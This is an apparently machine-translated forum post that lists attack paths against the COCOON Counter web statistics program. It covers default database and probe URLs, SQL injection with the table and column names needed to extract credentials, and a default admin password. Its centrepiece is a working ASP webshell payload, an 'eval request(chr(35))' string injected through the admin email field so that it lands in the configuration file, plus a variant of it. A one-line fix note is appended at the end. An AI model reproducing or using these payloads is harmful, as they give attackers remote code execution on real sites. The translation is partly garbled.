Summary of COCOON Counter statistics program vulnerabilities

 
1. Default database:
Counter/_ db/db_CC_Counter6.mdb
It can also be opened directly: http://www.bkjia.com/Counter/utilities/update. asp
View the source file and find <! To find the database address. Program problems.
Ii. brute-force Path Vulnerability
Use probe http://www.bkjia.com/Counter/utilities/aspSysCheck. asp to view the website path.
Iii. Injection
User injection exists. You can guess the user's account and password. You cannot use the SHELL but only the social worker can use it.
Http://www.bkjia.com/xxcount/core/default. asp? Id = xxcnc
Traffic Statistics username is xxcnc, Save Password table name is t_Site, username column is UID, password column is PWD, login page (http://www.bkjia.com/xxcount/supervise/login. asp)
Iv. Background plug-in
You need to enter the background to insert a SHELL statement. However, the administrator password is admin, which is not stored in the database and in _ inc/Common. asp.
Specific: Enter the management mailbox in the background
Cnhacker@263.net ": eval request (chr (35 ))//
Copy the file and click Save to view the content of _ inc/common. asp.
WebMasterEmail = "cnhacker@263.net \": eval request (chr (35 ))//"
Hey, come and execute it. Hey, hey! If it succeeds, the background in the statistics program will escape "to \", so evalrequest (chr (35) is used. Hey, // is a comment, which means a line break in asp, the premise is that you can enter the background, (many background management passwords are admin) php can also be like this, and there are more places than asp! You need to make good use of the symbols before and after the configuration statement.
Another note: Some people mentioned a similar method for anti-DDoS. You can write it as 9 xiao "%> <% eval request (chr (35) %> <% ', this method is also clever. // and 'are comments in asp!
By happy revenge


Www.2cto.com provides the repair solution:
Change the default path and password. Enhance filtering and verification.